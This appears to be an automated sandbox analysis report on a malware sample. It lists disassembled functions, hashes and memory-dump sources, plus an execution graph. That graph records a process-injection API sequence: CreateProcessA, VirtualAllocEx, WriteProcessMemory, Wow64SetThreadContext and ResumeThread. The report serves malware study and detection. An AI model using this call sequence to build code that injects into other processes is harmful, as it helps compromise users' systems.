                                                          Function 062C349D Relevance: 1.3, Instructions: 1277COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2345112018.00000000062C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 062C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_62c0000_I5pvP0CU6M.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: eadef1adc461fef3036a712cf3915dce1855b96668362004ec78cd07b3bc75b0
                                                          • Instruction ID: 2dbb0bc691e6ad378f00469d7d810f4ed3bf0d6a46a3db8c74dd516e1cdd0e9c
                                                          • Opcode Fuzzy Hash: eadef1adc461fef3036a712cf3915dce1855b96668362004ec78cd07b3bc75b0
                                                          • Instruction Fuzzy Hash: 65A1B074B102059FDB45DB78C854A6EBBF2EF89310B2489AEE915DB3A2CB70DC05CB51
                                                          Function 062C3138 Relevance: .2, Instructions: 238COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2345112018.00000000062C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 062C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_62c0000_I5pvP0CU6M.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d499bac5280c43798be0689b9075993cd83bff64b78fe8ae4a2bc94a3f44b6c5
                                                          • Instruction ID: bb79c426b4f00ff41dac2ec8ff3d0cbf640fbd4e597708ad687d5f1beb48ed38
                                                          • Opcode Fuzzy Hash: d499bac5280c43798be0689b9075993cd83bff64b78fe8ae4a2bc94a3f44b6c5
                                                          • Instruction Fuzzy Hash: 8E917E35B102159FCB44CF68C894E9ABBF2FF89710B1584AAEA05EB361DB71EC05CB51
                                                          Function 062C11A8 Relevance: .2, Instructions: 202COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2345112018.00000000062C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 062C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_62c0000_I5pvP0CU6M.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 94de672d39c42c126d4ae43bb3d86e20829fd0ecb1e773bfcbb59e773d748c5a
                                                          • Instruction ID: 660312f84b7c15cab9a3fa86063032810763d98cd0bfe5064f59cfcc1835add4
                                                          • Opcode Fuzzy Hash: 94de672d39c42c126d4ae43bb3d86e20829fd0ecb1e773bfcbb59e773d748c5a
                                                          • Instruction Fuzzy Hash: C4515735B203568FD7509A7DD85856ABBE9EFC2220B14827FDD05CB612EB30C851C7A2
                                                          Function 00E4D054 Relevance: .1, Instructions: 77COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2324064629.0000000000E4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E4D000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_e4d000_I5pvP0CU6M.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 41892f4eda8fc0d68c2915ec13d45a7ca745c8f6156167541e72aa635d36c837
                                                          • Instruction ID: 61b330b1c7fb871056f7aab8b80eda69bbfa356f6fc8846c4785960d0725e735
                                                          • Opcode Fuzzy Hash: 41892f4eda8fc0d68c2915ec13d45a7ca745c8f6156167541e72aa635d36c837
                                                          • Instruction Fuzzy Hash: 55210872508244EFDB15DF10EDC0B2ABF66FB88318F24C159ED091B256C376D816CB61
                                                          Function 00E5D474 Relevance: .1, Instructions: 72COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2324187331.0000000000E5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E5D000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_e5d000_I5pvP0CU6M.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 0e53f33098540a0f121a1bd28f59119fa8913ad659a44822fb7f0c28145985dd
                                                          • Instruction ID: d18f817a4eb923f18b2553ec7fd3745d24f622b52641b10266047035063ae152
                                                          • Opcode Fuzzy Hash: 0e53f33098540a0f121a1bd28f59119fa8913ad659a44822fb7f0c28145985dd
                                                          • Instruction Fuzzy Hash: C9214971508304EFCB14DF50C9C0B26BB61FB84319F20C96DDD095B352C776D84ACA62
                                                          Function 00E5D2C4 Relevance: .1, Instructions: 72COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2324187331.0000000000E5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E5D000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_e5d000_I5pvP0CU6M.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 6fa84ca604317b0a4d09a666704d6b6cbe8eb5fd8f85049ddd42a1e26340d5d5
                                                          • Instruction ID: 7fd84a37f036f612fb470360fe45398581f453cc457063df55373c8944f2b12a
                                                          • Opcode Fuzzy Hash: 6fa84ca604317b0a4d09a666704d6b6cbe8eb5fd8f85049ddd42a1e26340d5d5
                                                          • Instruction Fuzzy Hash: F1213876508244EFDB24DF14DDC0B2ABB65FB84325F24C96DDC095B252C37AD84ACAA2
                                                          Function 00E4D04F Relevance: .1, Instructions: 58COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2324064629.0000000000E4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E4D000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_e4d000_I5pvP0CU6M.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 83fb694dd1e91a6ea135483331fab76a04ef60c4faa8ae053019808facf22284
                                                          • Instruction ID: aafea7dfae61d89f932c611f5b0ff08a931eb77c05539f2674a4996a63e4bc15
                                                          • Opcode Fuzzy Hash: 83fb694dd1e91a6ea135483331fab76a04ef60c4faa8ae053019808facf22284
                                                          • Instruction Fuzzy Hash: 87219D76505284DFCB16CF10E9C4B1ABF72FB88318F2486A9DD491A656C33AD826CB91
                                                          Function 00E5D46F Relevance: .1, Instructions: 53COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2324187331.0000000000E5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E5D000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_e5d000_I5pvP0CU6M.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 703b7abd3718bd21aa6f36dac6c8dc0e73c65716f16ca45b46755fc1987422b6
                                                          • Instruction ID: a27b07eef366bccdb3a2f68d6ee95ff7701ee6e705bbd165974a6b8a630fdbb1
                                                          • Opcode Fuzzy Hash: 703b7abd3718bd21aa6f36dac6c8dc0e73c65716f16ca45b46755fc1987422b6
                                                          • Instruction Fuzzy Hash: DE119075508284DFCB15CF50D9C4B15BB71FB84318F24CAA9DC494B656C33AD84ACB52
                                                          Function 00E5D2BF Relevance: .1, Instructions: 53COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2324187331.0000000000E5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E5D000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_e5d000_I5pvP0CU6M.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ecf76333c4857edb0cae155a2ed822a1bfe38db2c40391184a4fb299c42cee64
                                                          • Instruction ID: 17f82b39b0a4845516f166bff0168bde3a2dca5e9ea5232a583f205b79332d83
                                                          • Opcode Fuzzy Hash: ecf76333c4857edb0cae155a2ed822a1bfe38db2c40391184a4fb299c42cee64
                                                          • Instruction Fuzzy Hash: 7811B276508684CFCB11CF10D9C4B19FB61FB84328F24C6AADC495B656C33AD84ACBA2
                                                          Function 00E4DA91 Relevance: .0, Instructions: 45COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2324064629.0000000000E4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E4D000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_e4d000_I5pvP0CU6M.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 041cc0a9a8ffda182daeac0353e363366bec32118e5c829f45da5f7cffe2d90d
                                                          • Instruction ID: 7d82643f9acb98ed03ebb144eca936d232b34cb55182a8e957a4a2b63f04b94a
                                                          • Opcode Fuzzy Hash: 041cc0a9a8ffda182daeac0353e363366bec32118e5c829f45da5f7cffe2d90d
                                                          • Instruction Fuzzy Hash: 8001267110C3449AE7208F25ED84B67FFDCEF40378F18D05AEE096A283C6B99840D6B1
                                                          Function 00E4DA90 Relevance: .0, Instructions: 36COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2324064629.0000000000E4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E4D000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_e4d000_I5pvP0CU6M.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 05eff60cd7905268df375edf3f7b338c64d76fca82152d70bcabea10cfc54eb2
                                                          • Instruction ID: feca6048f7e456bb4240e67afbf0c0e1d33727c8d0e7d2a5587e9e44248622a1
                                                          • Opcode Fuzzy Hash: 05eff60cd7905268df375edf3f7b338c64d76fca82152d70bcabea10cfc54eb2
                                                          • Instruction Fuzzy Hash: 0BF062724093449EE7208E15DDC4B67FFD8EB51778F18C55AED085A283C279AC44CA71

                                                          Execution Graph

                                                          Execution Coverage:11%
                                                          Dynamic/Decrypted Code Coverage:100%
                                                          Signature Coverage:0%
                                                          Total number of Nodes:218
                                                          Total number of Limit Nodes:14
                                                          execution_graph 46201 7000280 46202 70002ba 46201->46202 46203 700034b 46202->46203 46207 7000378 46202->46207 46212 7000369 46202->46212 46204 7000341 46208 70007fd 46207->46208 46209 70003a6 46207->46209 46208->46204 46209->46208 46217 7000ca0 46209->46217 46224 7000c8f 46209->46224 46214 7000378 46212->46214 46213 70007fd 46213->46204 46214->46213 46215 7000ca0 2 API calls 46214->46215 46216 7000c8f 2 API calls 46214->46216 46215->46213 46216->46213 46218 7000cba 46217->46218 46222 7000ca0 CreateIconFromResourceEx 46217->46222 46223 7000c8f CreateIconFromResourceEx 46217->46223 46219 7000cc7 46218->46219 46220 7000cdf CreateIconFromResourceEx 46218->46220 46219->46208 46221 7000d6e 46220->46221 46221->46208 46222->46218 46223->46218 46229 7000ca0 CreateIconFromResourceEx 46224->46229 46230 7000c8f CreateIconFromResourceEx 46224->46230 46225 7000cc7 46225->46208 46226 7000cba 46226->46225 46227 7000cdf CreateIconFromResourceEx 46226->46227 46228 7000d6e 46227->46228 46228->46208 46229->46226 46230->46226 46231 7020e83 46232 7020ba5 46231->46232 46232->46231 46235 7023b23 46232->46235 46233 702128a 46236 7023b63 46235->46236 46237 7023bd1 46236->46237 46240 7023f20 46236->46240 46245 7023f1a 46236->46245 46237->46233 46241 7023f2f 46240->46241 46242 7023eff 46241->46242 46243 7023f6a ResumeThread 46241->46243 46242->46237 46244 7023f91 46243->46244 46244->46237 46246 7023f1e 46245->46246 46247 7023eff 46246->46247 46248 7023f6a ResumeThread 46246->46248 46247->46237 46249 7023f91 46248->46249 46249->46237 46250 ec4668 46251 ec4672 46250->46251 46253 ec4758 46250->46253 46254 ec475c 46253->46254 46258 ec4868 46254->46258 46262 ec4859 46254->46262 46260 ec486c 46258->46260 46259 ec496c 46260->46259 46266 ec44d4 46260->46266 46264 ec485c 46262->46264 46263 ec496c 46264->46263 46265 ec44d4 CreateActCtxA 46264->46265 46265->46263 46267 ec58f8 CreateActCtxA 46266->46267 46269 ec59bb 46267->46269 46464 ecd298 46465 ecd2de 46464->46465 46469 ecd478 46465->46469 46473 ecd469 46465->46473 46466 ecd3cb 46470 ecd47c 46469->46470 46477 ecb538 46470->46477 46474 ecd478 46473->46474 46475 ecb538 DuplicateHandle 46474->46475 46476 ecd4a6 46475->46476 46476->46466 46478 ecd4e0 DuplicateHandle 46477->46478 46480 ecd4a6 46478->46480 46480->46466 46270 7024887 46271 702488d 46270->46271 46272 7024b8f 46271->46272 46277 7026918 46271->46277 46292 702698e 46271->46292 46308 7026928 46271->46308 46273 7024972 46278 702691c 46277->46278 46284 702694a 46278->46284 46323 7027298 46278->46323 46328 7026e75 46278->46328 46335 7026ed6 46278->46335 46343 70270f0 46278->46343 46348 7026f48 46278->46348 46353 70274c8 46278->46353 46361 702738b 46278->46361 46366 7026d63 46278->46366 46370 70272e3 46278->46370 46377 7026ffd 46278->46377 46382 70271fe 46278->46382 46387 7026dd8 46278->46387 46284->46273 46293 702691c 46292->46293 46294 7026991 46292->46294 46295 70272e3 4 API calls 46293->46295 46296 7026d63 2 API calls 46293->46296 46297 702738b 2 API calls 46293->46297 46298 70274c8 4 API calls 46293->46298 46299 7026f48 2 API calls 46293->46299 46300 702694a 46293->46300 46301 70270f0 2 API calls 46293->46301 46302 7026ed6 4 API calls 46293->46302 46303 7026e75 2 API calls 46293->46303 46304 7027298 2 API calls 46293->46304 46305 7026dd8 2 API calls 46293->46305 46306 70271fe 2 API calls 46293->46306 46307 7026ffd 2 API calls 46293->46307 46294->46273 46295->46300 46296->46300 46297->46300 46298->46300 46299->46300 46300->46273 46301->46300 46302->46300 46303->46300 46304->46300 46305->46300 46306->46300 46307->46300 46309 7026942 46308->46309 46310 70272e3 4 API calls 46309->46310 46311 7026d63 2 API calls 46309->46311 46312 702738b 2 API calls 46309->46312 46313 70274c8 4 API calls 46309->46313 46314 7026f48 2 API calls 46309->46314 46315 702694a 46309->46315 46316 70270f0 2 API calls 46309->46316 46317 7026ed6 4 API calls 46309->46317 46318 7026e75 2 API calls 46309->46318 46319 7027298 2 API calls 46309->46319 46320 7026dd8 2 API calls 46309->46320 46321 70271fe 2 API calls 46309->46321 46322 7026ffd 2 API calls 46309->46322 46310->46315 46311->46315 46312->46315 46313->46315 46314->46315 46315->46273 46316->46315 46317->46315 46318->46315 46319->46315 46320->46315 46321->46315 46322->46315 46325 7027101 46323->46325 46324 70276d5 46325->46324 46326 7023f20 ResumeThread 46325->46326 46327 7023f1a ResumeThread 46325->46327 46326->46325 46327->46325 46392 7024160 46328->46392 46396 7024168 46328->46396 46329 7026de1 46330 7027760 46329->46330 46333 7024160 WriteProcessMemory 46329->46333 46334 7024168 WriteProcessMemory 46329->46334 46330->46284 46333->46329 46334->46329 46336 70274cf 46335->46336 46337 7027101 46336->46337 46400 7023fd0 46336->46400 46404 7023fc8 46336->46404 46338 70276d5 46337->46338 46341 7023f20 ResumeThread 46337->46341 46342 7023f1a ResumeThread 46337->46342 46341->46337 46342->46337 46344 7027101 46343->46344 46345 70276d5 46344->46345 46346 7023f20 ResumeThread 46344->46346 46347 7023f1a ResumeThread 46344->46347 46346->46344 46347->46344 46349 7026de1 46348->46349 46349->46348 46350 7027760 46349->46350 46351 7024160 WriteProcessMemory 46349->46351 46352 7024168 WriteProcessMemory 46349->46352 46350->46284 46351->46349 46352->46349 46354 70274ce 46353->46354 46356 7027101 46354->46356 46357 7023fd0 Wow64SetThreadContext 46354->46357 46358 7023fc8 Wow64SetThreadContext 46354->46358 46355 70276d5 46356->46355 46359 7023f20 ResumeThread 46356->46359 46360 7023f1a ResumeThread 46356->46360 46357->46356 46358->46356 46359->46356 46360->46356 46362 7027391 46361->46362 46408 7024252 46362->46408 46412 7024258 46362->46412 46363 70273b4 46416 70243f0 46366->46416 46420 70243e4 46366->46420 46424 70240a0 46370->46424 46428 70240a8 46370->46428 46371 7027216 46375 7024160 WriteProcessMemory 46371->46375 46376 7024168 WriteProcessMemory 46371->46376 46372 702711f 46375->46372 46376->46372 46378 70275a8 46377->46378 46380 7023fd0 Wow64SetThreadContext 46378->46380 46381 7023fc8 Wow64SetThreadContext 46378->46381 46379 70275c3 46380->46379 46381->46379 46383 7027205 46382->46383 46385 7024160 WriteProcessMemory 46383->46385 46386 7024168 WriteProcessMemory 46383->46386 46384 702711f 46385->46384 46386->46384 46388 7026de1 46387->46388 46389 7027760 46388->46389 46390 7024160 WriteProcessMemory 46388->46390 46391 7024168 WriteProcessMemory 46388->46391 46389->46284 46390->46388 46391->46388 46393 7024168 WriteProcessMemory 46392->46393 46395 7024207 46393->46395 46395->46329 46397 70241b0 WriteProcessMemory 46396->46397 46399 7024207 46397->46399 46399->46329 46401 7024015 Wow64SetThreadContext 46400->46401 46403 702405d 46401->46403 46403->46337 46405 7023fd0 Wow64SetThreadContext 46404->46405 46407 702405d 46405->46407 46407->46337 46409 7024258 ReadProcessMemory 46408->46409 46411 70242e7 46409->46411 46411->46363 46413 70242a3 ReadProcessMemory 46412->46413 46415 70242e7 46413->46415 46415->46363 46417 7024479 46416->46417 46417->46417 46418 70245de CreateProcessA 46417->46418 46419 702463b 46418->46419 46421 7024479 46420->46421 46421->46421 46422 70245de CreateProcessA 46421->46422 46423 702463b 46422->46423 46425 70240e8 VirtualAllocEx 46424->46425 46427 7024125 46425->46427 46427->46371 46429 70240e8 VirtualAllocEx 46428->46429 46431 7024125 46429->46431 46431->46371 46436 7027c18 46438 7027c1c 46436->46438 46439 7027da3 46438->46439 46440 70252c8 46438->46440 46441 7027e98 PostMessageW 46440->46441 46442 7027f04 46441->46442 46442->46438 46460 7020cd8 46461 7020ce8 46460->46461 46463 7023b23 2 API calls 46461->46463 46462 7020d0f 46463->46462 46456 4eb40a0 46457 4eb40a4 46456->46457 46458 4eb413a CallWindowProcW 46457->46458 46459 4eb40e9 46457->46459 46458->46459 46443 ecadf0 46444 ecadf4 46443->46444 46447 ecaed9 46444->46447 46445 ecadff 46449 ecaee5 46447->46449 46448 ecaf1c 46448->46445 46449->46448 46450 ecb120 GetModuleHandleW 46449->46450 46451 ecb14d 46450->46451 46451->46445

                                                          Executed Functions

                                                          Function 07026E1F Relevance: .0, Instructions: 16COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2320304373.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_7020000_VcihjWRO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 70ac4b3551744ec329612cc32b2b53525f15c43c808942f06b9866bd4f3f9e24
                                                          • Instruction ID: cf466b4810d8556ee0fa33262f6e56a1caf1b2d67224774541bc03ff03af6fee
                                                          • Opcode Fuzzy Hash: 70ac4b3551744ec329612cc32b2b53525f15c43c808942f06b9866bd4f3f9e24
                                                          • Instruction Fuzzy Hash: 01C09BA7DDF034D59900688470000FCE33CD38B025F403651D32DE3501451045176555
                                                          Function 070243E4 Relevance: 1.7, APIs: 1, Instructions: 247processCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 561 70243e4-7024485 563 7024487-7024491 561->563 564 70244be-70244de 561->564 563->564 565 7024493-7024495 563->565 571 70244e0-70244ea 564->571 572 7024517-7024546 564->572 566 7024497-70244a1 565->566 567 70244b8-70244bb 565->567 569 70244a3 566->569 570 70244a5-70244b4 566->570 567->564 569->570 570->570 573 70244b6 570->573 571->572 574 70244ec-70244ee 571->574 580 7024548-7024552 572->580 581 702457f-7024639 CreateProcessA 572->581 573->567 575 70244f0-70244fa 574->575 576 7024511-7024514 574->576 578 70244fe-702450d 575->578 579 70244fc 575->579 576->572 578->578 582 702450f 578->582 579->578 580->581 583 7024554-7024556 580->583 592 7024642-70246c8 581->592 593 702463b-7024641 581->593 582->576 585 7024558-7024562 583->585 586 7024579-702457c 583->586 587 7024566-7024575 585->587 588 7024564 585->588 586->581 587->587 590 7024577 587->590 588->587 590->586 603 70246ca-70246ce 592->603 604 70246d8-70246dc 592->604 593->592 603->604 607 70246d0 603->607 605 70246de-70246e2 604->605 606 70246ec-70246f0 604->606 605->606 608 70246e4 605->608 609 70246f2-70246f6 606->609 610 7024700-7024704 606->610 607->604 608->606 609->610 611 70246f8 609->611 612 7024716-702471d 610->612 613 7024706-702470c 610->613 611->610 614 7024734 612->614 615 702471f-702472e 612->615 613->612 616 7024735 614->616 615->614 616->616
                                                          APIs
                                                          • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07024626
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2320304373.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_7020000_VcihjWRO.jbxd
                                                          Similarity
                                                          • API ID: CreateProcess
                                                          • String ID:
                                                          • API String ID: 963392458-0
                                                          • Opcode ID: 6689371a29557df2f7148f545de0a06ee53716a593163b4de061e248992a9fb1
                                                          • Instruction ID: 48d5c2809645f8d6aa981e5adaf0261eaf6c1c52d83aac3cc213d4c90b4d0e6f
                                                          • Opcode Fuzzy Hash: 6689371a29557df2f7148f545de0a06ee53716a593163b4de061e248992a9fb1
                                                          • Instruction Fuzzy Hash: 0FA15CB1D0066ACFEB14CF68C945B9DBBF2BF48310F148269E849A7240DB749986DF91
                                                          Function 070243F0 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 618 70243f0-7024485 620 7024487-7024491 618->620 621 70244be-70244de 618->621 620->621 622 7024493-7024495 620->622 628 70244e0-70244ea 621->628 629 7024517-7024546 621->629 623 7024497-70244a1 622->623 624 70244b8-70244bb 622->624 626 70244a3 623->626 627 70244a5-70244b4 623->627 624->621 626->627 627->627 630 70244b6 627->630 628->629 631 70244ec-70244ee 628->631 637 7024548-7024552 629->637 638 702457f-7024639 CreateProcessA 629->638 630->624 632 70244f0-70244fa 631->632 633 7024511-7024514 631->633 635 70244fe-702450d 632->635 636 70244fc 632->636 633->629 635->635 639 702450f 635->639 636->635 637->638 640 7024554-7024556 637->640 649 7024642-70246c8 638->649 650 702463b-7024641 638->650 639->633 642 7024558-7024562 640->642 643 7024579-702457c 640->643 644 7024566-7024575 642->644 645 7024564 642->645 643->638 644->644 647 7024577 644->647 645->644 647->643 660 70246ca-70246ce 649->660 661 70246d8-70246dc 649->661 650->649 660->661 664 70246d0 660->664 662 70246de-70246e2 661->662 663 70246ec-70246f0 661->663 662->663 665 70246e4 662->665 666 70246f2-70246f6 663->666 667 7024700-7024704 663->667 664->661 665->663 666->667 668 70246f8 666->668 669 7024716-702471d 667->669 670 7024706-702470c 667->670 668->667 671 7024734 669->671 672 702471f-702472e 669->672 670->669 673 7024735 671->673 672->671 673->673
                                                          APIs
                                                          • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07024626
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2320304373.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_7020000_VcihjWRO.jbxd
                                                          Similarity
                                                          • API ID: CreateProcess
                                                          • String ID:
                                                          • API String ID: 963392458-0
                                                          • Opcode ID: a9de2361afb3c069666a178a99057b39757b3cba331c29b45bff0b28dbd88d79
                                                          • Instruction ID: ad2f10b0dab639265747c9eda4d60f9412e133d8f033ac8130ecca06717613bc
                                                          • Opcode Fuzzy Hash: a9de2361afb3c069666a178a99057b39757b3cba331c29b45bff0b28dbd88d79
                                                          • Instruction Fuzzy Hash: E3915DB1D0066ACFEB14CF68C941B9DBBF2BF48310F148269E849A7240DB749986DF91
                                                          Function 00ECAED9 Relevance: 1.7, APIs: 1, Instructions: 201COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 675 ecaed9-ecaee6 677 ecaeec-ecaef7 675->677 678 ecaee8-ecaeeb 675->678 679 ecaef9-ecaf06 call ec9e40 677->679 680 ecaf23-ecaf27 677->680 678->677 685 ecaf1c 679->685 686 ecaf08 679->686 682 ecaf29-ecaf33 680->682 683 ecaf3b-ecaf7c 680->683 682->683 689 ecaf7e-ecaf86 683->689 690 ecaf89-ecaf97 683->690 685->680 733 ecaf0e call ecb548 686->733 734 ecaf0e call ecb580 686->734 735 ecaf0e call ecb570 686->735 689->690 691 ecaf99-ecaf9e 690->691 692 ecafbb-ecafbd 690->692 694 ecafa9 691->694 695 ecafa0-ecafa7 call ec9e4c 691->695 697 ecafc0-ecafc7 692->697 693 ecaf14-ecaf16 693->685 696 ecb058-ecb118 693->696 699 ecafab-ecafb9 694->699 695->699 728 ecb11a-ecb11d 696->728 729 ecb120-ecb14b GetModuleHandleW 696->729 700 ecafc9-ecafd1 697->700 701 ecafd4-ecafdb 697->701 699->697 700->701 703 ecafdd-ecafe5 701->703 704 ecafe8-ecaff1 call ec9e5c 701->704 703->704 709 ecaffe-ecb003 704->709 710 ecaff3-ecaffb 704->710 711 ecb005-ecb00c 709->711 712 ecb021-ecb02e 709->712 710->709 711->712 714 ecb00e-ecb01e call ec9e6c call ec9e7c 711->714 719 ecb030-ecb04e 712->719 720 ecb051-ecb057 712->720 714->712 719->720 728->729 730 ecb14d-ecb153 729->730 731 ecb154-ecb168 729->731 730->731 733->693 734->693 735->693
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2314634946.0000000000EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ec0000_VcihjWRO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: fdc0b86a7efb37db81b717ef5c619e799c542bf7cce0b4c1c9cdb47c9a8da303
                                                          • Instruction ID: ff83d82dfe0c46ac56f0ca89297f27e9b90316cb117fae8996ff2cea63a9f596
                                                          • Opcode Fuzzy Hash: fdc0b86a7efb37db81b717ef5c619e799c542bf7cce0b4c1c9cdb47c9a8da303
                                                          • Instruction Fuzzy Hash: F5818B70A00B458FD724DF2AD155B5ABBF1FF88304F048A2DE056E7A41D775E846CB91
                                                          Function 00EC58EC Relevance: 1.6, APIs: 1, Instructions: 101COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 736 ec58ec-ec58ee 737 ec58f4-ec58f6 736->737 738 ec58f0-ec58f2 736->738 739 ec58f8-ec58fb 737->739 740 ec58fc-ec59b9 CreateActCtxA 737->740 738->737 738->739 739->740 742 ec59bb-ec59c1 740->742 743 ec59c2-ec5a1c 740->743 742->743 750 ec5a1e-ec5a21 743->750 751 ec5a2b-ec5a2f 743->751 750->751 752 ec5a40 751->752 753 ec5a31-ec5a3d 751->753 755 ec5a41 752->755 753->752 755->755
                                                          APIs
                                                          • CreateActCtxA.KERNEL32(?), ref: 00EC59A9
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2314634946.0000000000EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ec0000_VcihjWRO.jbxd
                                                          Similarity
                                                          • API ID: Create
                                                          • String ID:
                                                          • API String ID: 2289755597-0
                                                          • Opcode ID: fc22f077bb81f154a4c99ac556669bb73b9697ae8d80cea6ebd61adace5df237
                                                          • Instruction ID: c170c265a1e9235a23c5cfd9f95b5c43869af8e331be0ef12c916f7084c2fc99
                                                          • Opcode Fuzzy Hash: fc22f077bb81f154a4c99ac556669bb73b9697ae8d80cea6ebd61adace5df237
                                                          • Instruction Fuzzy Hash: 8341E271C00719CBDB24DFAAC944B8EBBB5BF89704F20816AD418BB251DB766946CF90
                                                          Function 00EC44D4 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 756 ec44d4-ec59b9 CreateActCtxA 760 ec59bb-ec59c1 756->760 761 ec59c2-ec5a1c 756->761 760->761 768 ec5a1e-ec5a21 761->768 769 ec5a2b-ec5a2f 761->769 768->769 770 ec5a40 769->770 771 ec5a31-ec5a3d 769->771 773 ec5a41 770->773 771->770 773->773
                                                          APIs
                                                          • CreateActCtxA.KERNEL32(?), ref: 00EC59A9
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2314634946.0000000000EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ec0000_VcihjWRO.jbxd
                                                          Similarity
                                                          • API ID: Create
                                                          • String ID:
                                                          • API String ID: 2289755597-0
                                                          • Opcode ID: ce79188d0fa30b16586c17ce709333793e48bca7466f94ad27b06d618075610a
